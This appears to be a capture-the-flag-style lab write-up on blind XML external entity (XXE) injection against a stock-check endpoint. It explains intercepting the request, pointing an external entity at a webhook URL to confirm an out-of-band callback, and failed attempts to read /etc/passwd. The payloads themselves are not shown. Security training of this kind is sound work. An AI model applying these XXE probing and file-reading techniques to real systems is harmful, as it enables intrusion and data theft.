Path: /catalog/product/stock
Path: /catalog/product/stock
Difficulties: JavaScript event handlers, JavaScript modifies request, JavaScript client-side rendering
Technologies: JavaScript
Vulnerabilities: XML external entity injectionWe need Burp Collaborator for this task. This feature is present in burp suite pro version.
Vulnerability 1: XML external entity injection
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.
Manual testing for this
I have a page with functionality to check the stack.
One product that allows us to check the stock is shown below:
Start the burp Intercept and then check the stock.
Got this XML Code. I will modify the payload according to this.
Since I don't have a public-facing IP address, I will use a site called Webhook. This site will capture any requests made to it by the target website, allowing me to confirm the presence of an XXE vulnerability.
To begin, I will first visit the Webhook site and generate a unique URL.
Copy the Unique URL and then Open it in a new tab.
Payload for XXE:
I kept everything else as it is and only added the Webhook site URL with the unique ID.
The request was sent, and we received an error message stating, "Product ID must be a number." Despite this error, a request was successfully made to our payload site, and it was captured. You can see that the request has been logged on the Webhook site.
In portSwigger site, We can see that there is payload for XXE to retrieve the "/etc/passwd" files.
Tried fetching files, first assuming the underlying system was Linux, and then assuming it was Windows. However, both attempts failed.
Last updated
Was this helpful?